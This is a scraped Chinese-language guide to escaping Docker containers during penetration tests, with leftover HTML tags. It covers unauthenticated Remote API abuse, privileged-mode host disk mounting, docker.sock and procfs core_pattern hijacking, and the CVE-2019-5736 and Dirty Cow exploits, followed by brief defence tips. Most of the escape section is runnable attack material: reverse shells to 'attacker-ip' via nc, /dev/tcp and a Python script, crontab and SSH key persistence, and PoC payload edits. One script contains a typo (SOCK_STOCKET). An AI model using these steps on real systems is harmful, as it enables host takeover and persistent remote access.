Docker逃逸技术全面指南<\/h1>

一、Docker环境检测<\/h2>

在渗透测试中，判断当前环境是否为Docker容器是逃逸的前提条件。以下是几种有效的检测方法：<\/p>

文件检测法<\/strong>：<\/p>

检查根目录下是否存在.dockerenv<\/code>文件<\/li>
检查\/proc\/1\/cgroup<\/code>文件中是否包含"docker"字符串<\/li> <\/ul> <\/li>
环境变量检测<\/strong>：<\/p> 检查是否存在container<\/code>环境变量<\/li> 检查PATH<\/code>环境变量中是否有docker相关路径<\/li> <\/ul> <\/li> 其他辅助检测方法<\/strong>：<\/p> 使用mount<\/code>命令查看挂载信息<\/li> 使用fdisk -l<\/code>查看硬盘信息<\/li> 检查PID 1的进程名是否为容器特有进程<\/li> <\/ul> <\/li> <\/ol> Metasploit中可以使用checkcontainer<\/code>模块进行自动化检测（虚拟机检测使用checkvm<\/code>模块）。<\/p> 二、Docker逃逸技术分类<\/h2> 1. 危险配置导致的逃逸<\/h3> (1) Docker Remote API未授权访问<\/h4> 利用条件<\/strong>：<\/p> Docker Remote API（2375端口）暴露且未授权<\/li> <\/ul> 利用方法<\/strong>：<\/p> 通过API启动一个容器，挂载宿主机\/etc<\/code>目录<\/li> 写入crontab计划任务实现反弹shell<\/li> <\/ol> 示例代码<\/strong>：<\/p> import<\/span> docker <\/span><\/span>client =<\/span> docker.<\/span>DockerClient(base_url=<\/span>'http:\/\/target-ip:2375\/'<\/span>) <\/span><\/span>data =<\/span> client.<\/span>containers.<\/span>run('alpine:latest'<\/span>, <\/span><\/span> r<\/span>'''sh -c "echo usr\/bin\/nc attacker-ip 21 -e \/bin\/sh' >> \/tmp\/etc\/crontabs\/root"'''<\/span>, <\/span><\/span> remove=<\/span>True<\/span>, <\/span><\/span> volumes=<\/span>{'\/etc'<\/span>: {'bind'<\/span>: '\/tmp\/etc'<\/span>, 'mode'<\/span>: 'rw'<\/span>}}) <\/span><\/span><\/code><\/pre>(2) 特权模式(--privileged)逃逸<\/h4> 利用条件<\/strong>：<\/p> 容器以--privileged<\/code>参数启动<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 查看磁盘设备：fdisk -l<\/code><\/li> 创建挂载点：mkdir \/test<\/code><\/li> 挂载宿主机磁盘：mount \/dev\/vda1 \/test<\/code><\/li> 切换根目录：chroot \/test<\/code><\/li> <\/ol> 后续利用<\/strong>：<\/p> 写入计划任务反弹shell： echo 'bash -i >& \/dev\/tcp\/attacker-ip\/port 0>&1'<\/span> >> \/test\/var\/spool\/cron\/crontabs\/root <\/span><\/span><\/code><\/pre><\/li> 写入SSH公钥： mkdir \/root\/.ssh <\/span><\/span>cat id_rsa.pub >> \/root\/.ssh\/authorized_keys <\/span><\/span><\/code><\/pre><\/li> <\/ul> (3) 其他危险参数<\/h4> --cap-add=SYS_ADMIN<\/code>：允许执行mount特权操作<\/li> --net=host<\/code>：绕过Network Namespace<\/li> --pid=host<\/code>：绕过PID Namespace<\/li> --ipc=host<\/code>：绕过IPC Namespace<\/li> <\/ul> 2. 危险挂载导致的逃逸<\/h3> (1) 挂载Docker Socket<\/h4> 利用条件<\/strong>：<\/p> \/var\/run\/docker.sock<\/code>被挂载到容器中<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 在容器内安装Docker客户端<\/li> 通过socket与宿主机Docker守护进程通信<\/li> 创建新容器并挂载宿主机根目录<\/li> 使用chroot<\/code>切换根目录<\/li> <\/ol> (2) 挂载宿主机procfs<\/h4> 利用条件<\/strong>：<\/p> 宿主机\/proc<\/code>目录被挂载到容器中<\/li> 容器有root权限且未开启User Namespace<\/li> <\/ul> 利用方法（core_pattern利用）<\/strong>：<\/p> 创建反弹shell脚本\/tmp\/.x.py<\/code>：<\/li> <\/ol> import<\/span> os <\/span><\/span>import<\/span> pty <\/span><\/span>import<\/span> socket <\/span><\/span> <\/span><\/span>lhost =<\/span> "attacker-ip"<\/span> <\/span><\/span>lport =<\/span> 10000<\/span> <\/span><\/span> <\/span><\/span>def<\/span> main<\/span>(): <\/span><\/span> s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STOCKET) <\/span><\/span> s.<\/span>connect((lhost, lport)) <\/span><\/span> os.<\/span>dup2(s.<\/span>fileno(), 0<\/span>) <\/span><\/span> os.<\/span>dup2(s.<\/span>fileno(), 1<\/span>) <\/span><\/span> os.<\/span>dup2(s.<\/span>fileno(), 2<\/span>) <\/span><\/span> os.<\/span>putenv("HISTFILE"<\/span>, "\/dev\/null"<\/span>) <\/span><\/span> pty.<\/span>spawn("\/bin\/bash"<\/span>) <\/span><\/span> os.<\/span>remove("\/tmp\/.x.py"<\/span>) <\/span><\/span> s.<\/span>close() <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> main() <\/span><\/span><\/code><\/pre> 获取容器在宿主机上的绝对路径：<\/li> <\/ol> cat \/proc\/mounts | grep docker <\/span><\/span><\/code><\/pre> 修改core_pattern：<\/li> <\/ol> echo -e "|\/var\/lib\/docker\/overlay2\/[容器ID]\/merged\/tmp\/.x.py \rcore "<\/span> > \/host\/proc\/sys\/kernel\/core_pattern <\/span><\/span><\/code><\/pre> 触发崩溃程序：<\/li> <\/ol> int<\/span> main<\/span>(void<\/span>) {int<\/span> *<\/span>a =<\/span> NULL; *<\/span>a =<\/span> 1<\/span>; return<\/span> 0<\/span>;} <\/span><\/span><\/code><\/pre>3. 程序漏洞导致的逃逸<\/h3> (1) runC容器逃逸漏洞(CVE-2019-5736)<\/h4> 影响版本<\/strong>：<\/p> Docker < 18.09.2<\/li> runC < 1.0-rc6<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 下载PoC：<\/li> <\/ol> git clone https:\/\/github.com\/Frichetten\/CVE-2019-5736-PoC <\/span><\/span><\/code><\/pre> 修改Payload：<\/li> <\/ol> payload<\/span> = "#!\/bin\/bash \n bash -i >& \/dev\/tcp\/attacker-ip\/port 0>&1"<\/span> <\/span><\/span><\/code><\/pre> 编译并拷贝到容器：<\/li> <\/ol> CGO_ENABLED=<\/span>0<\/span> GOOS=<\/span>linux GOARCH=<\/span>amd64 go build main.go <\/span><\/span>docker cp .\/main container-id:\/tmp <\/span><\/span><\/code><\/pre> 等待管理员进入容器触发漏洞<\/li> <\/ol> (2) Docker cp命令漏洞(CVE-2019-14271)<\/h4> 影响版本<\/strong>：<\/p> Docker 19.03.0<\/li> <\/ul> 利用原理<\/strong>：<\/p> 通过替换容器中的libnss.so库注入恶意代码<\/li> 当执行docker cp<\/code>命令时触发<\/li> <\/ul> (3) 内核漏洞利用(Dirty Cow)<\/h4> 利用条件<\/strong>：<\/p> 宿主机内核存在漏洞（如CVE-2016-5195）<\/li> 容器与宿主机共享内核<\/li> <\/ul> 利用方法<\/strong>：<\/p> git clone https:\/\/github.com\/gebl\/dirtycow-docker-vdso.git <\/span><\/span><\/code><\/pre>三、防御建议<\/h2> 最小权限原则<\/strong>：<\/p> 避免使用--privileged<\/code>参数<\/li> 限制容器capabilities<\/li> 启用User Namespace<\/li> <\/ul> <\/li> 安全配置<\/strong>：<\/p> 禁止Docker Remote API未授权访问<\/li> 避免挂载敏感目录(\/proc, \/var\/run\/docker.sock等)<\/li> <\/ul> <\/li> 及时更新<\/strong>：<\/p> 保持Docker和宿主机内核版本最新<\/li> 及时修复已知漏洞<\/li> <\/ul> <\/li> 安全审计<\/strong>：<\/p> 定期检查容器配置<\/li> 监控异常行为<\/li> <\/ul> <\/li> <\/ol> 四、参考资料<\/h2> Docker官方文档<\/a><\/li> CVE-2019-5736 PoC<\/a><\/li> DirtyCow Docker逃逸<\/a><\/li> 容器安全最佳实践<\/a><\/li> <\/ol>